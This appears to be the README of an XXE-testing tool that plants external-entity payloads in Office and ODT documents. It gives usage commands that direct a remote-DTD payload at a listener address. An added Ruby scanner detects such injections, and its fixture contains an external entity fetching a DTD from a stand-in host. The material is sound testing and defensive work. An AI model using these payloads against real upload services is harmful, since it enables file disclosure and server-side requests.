This tool is meant to help test XXE vulnerabilities in OXML document file formats. Currently supported:
- DOCX/XLSX/PPTX
- ODT
- GIF (experimental)
BH USA 2015 Presentation:
Exploiting XXE in File Upload Functionality
Blog Posts on the topic:
Exploiting XXE Vulnerabilities in OXML Documents - Part 1
Installation is easy: you will need a copy of Ruby and two gems.
gem install highline
gem install zipruby
or
gem install bundler
bundle install
Usage examples:
ruby oxml_xxe.rb --poc pdf -i 192.168.14.1:8000
ruby oxml_xxe.rb -s -i 192.168.14.1:8000
Select payload 11 ("remote_DTD")
ruby oxml_xxe.rb -f samples/sample.xlsx -s -i 192.168.14.1:8000
Select payload 11 ("remote_DTD")
There are two main modes:
Build mode adds a DOCTYPE and inserts the XML Entity into the file of the user's choice.
String replacement mode goes through the document looking for the symbol §. The XML Entity ("&xxe;") replaces every instance of this symbol. Note that you can open the document and insert § anywhere to have it replaced. The common use case is a web application which reads in an xlsx and then prints the results to the screen; by exploiting the XXE, the entity's contents end up printed to the screen.
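Both modes leave a visible footprint inside the package's XML parts: build mode adds a DOCTYPE with an ENTITY declaration, and string replacement mode leaves references to a custom entity where § used to be. The following is an added example, not part of the oxml_xxe project, showing the defensive counterpart: a scanner that an upload handler can run over the XML parts of a DOCX/XLSX/PPTX before handing them to an XML parser. To stay dependency-free it models the zip package as a Hash of part name to part text (assumed structure; a real check would read the zip entries with zipruby or rubyzip). The part names, namespace URIs and the `dtd-host.example` URL in the injected sample are constructed fixtures.

```ruby
# Added example (not oxml_xxe code): flag DOCTYPE/ENTITY injection and custom
# entity references in OXML XML parts before they reach an XML parser.

# The five entities XML predefines; any other reference means a DTD declared it.
PREDEFINED_ENTITIES = %w[lt gt amp quot apos].freeze

# Returns an array of human-readable findings for one XML part (empty if clean).
def scan_xml_part(name, xml)
  findings = []

  # Build mode footprint: a DOCTYPE where OXML parts never carry one.
  findings << "#{name}: DOCTYPE declaration present" if xml =~ /<!DOCTYPE\b/i

  # Any ENTITY declaration; SYSTEM/PUBLIC marks it as external (file or URL).
  xml.scan(/<!ENTITY\s+(%\s*)?([\w.-]+)\s+([^>]*)>/i) do |param, ent, rest|
    kind = rest =~ /\A(SYSTEM|PUBLIC)\b/i ? "external" : "internal"
    findings << "#{name}: #{kind} entity '#{ent}'#{param ? ' (parameter entity)' : ''}"
  end

  # String replacement footprint: a reference to a non-predefined entity.
  xml.scan(/&([A-Za-z_][\w.-]*);/) do |m|
    ent = m.first
    next if PREDEFINED_ENTITIES.include?(ent)
    findings << "#{name}: reference to custom entity '&#{ent};'"
  end

  findings
end

# Scans every XML-like part of a package (Hash of part name => content).
# Relationship (.rels) parts are XML too and are included.
def scan_package(parts)
  parts.select { |part_name, _| part_name.end_with?(".xml", ".rels") }
       .flat_map { |part_name, xml| scan_xml_part(part_name, xml) }
end

# Gate for an upload handler: only parse packages with no findings.
def safe_to_parse?(parts)
  scan_package(parts).empty?
end

# Constructed fixture: a minimal clean sharedStrings part of an XLSX.
CLEAN_SST = <<~XML
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
    <si><t>Quarterly totals</t></si>
  </sst>
XML

# Constructed fixture shaped like the tool's output: build mode added the
# DOCTYPE and external entity, string replacement turned a § cell into &xxe;.
INJECTED_SST = <<~XML
  <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
  <!DOCTYPE sst [ <!ENTITY xxe SYSTEM "http://dtd-host.example/remote.dtd"> ]>
  <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
    <si><t>&xxe;</t></si>
  </sst>
XML

CONTENT_TYPES = '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>'

CLEAN_PACKAGE = {
  "[Content_Types].xml" => CONTENT_TYPES,
  "xl/sharedStrings.xml" => CLEAN_SST,
  "docProps/thumbnail.jpeg" => "(binary image bytes, skipped by the scanner)"
}.freeze

INJECTED_PACKAGE = CLEAN_PACKAGE.merge("xl/sharedStrings.xml" => INJECTED_SST).freeze

if __FILE__ == $0
  puts "clean package: #{scan_package(CLEAN_PACKAGE).inspect}"
  puts "injected package:"
  scan_package(INJECTED_PACKAGE).each { |f| puts "  #{f}" }
end
```

The scan is a pre-filter, not a substitute for a safe parser configuration: the XML library that eventually reads the parts should still have DTD loading, network access and entity substitution disabled (for Nokogiri, leave `NOENT` off and set `NONET`), so that a document slipping past the regexes is still harmless.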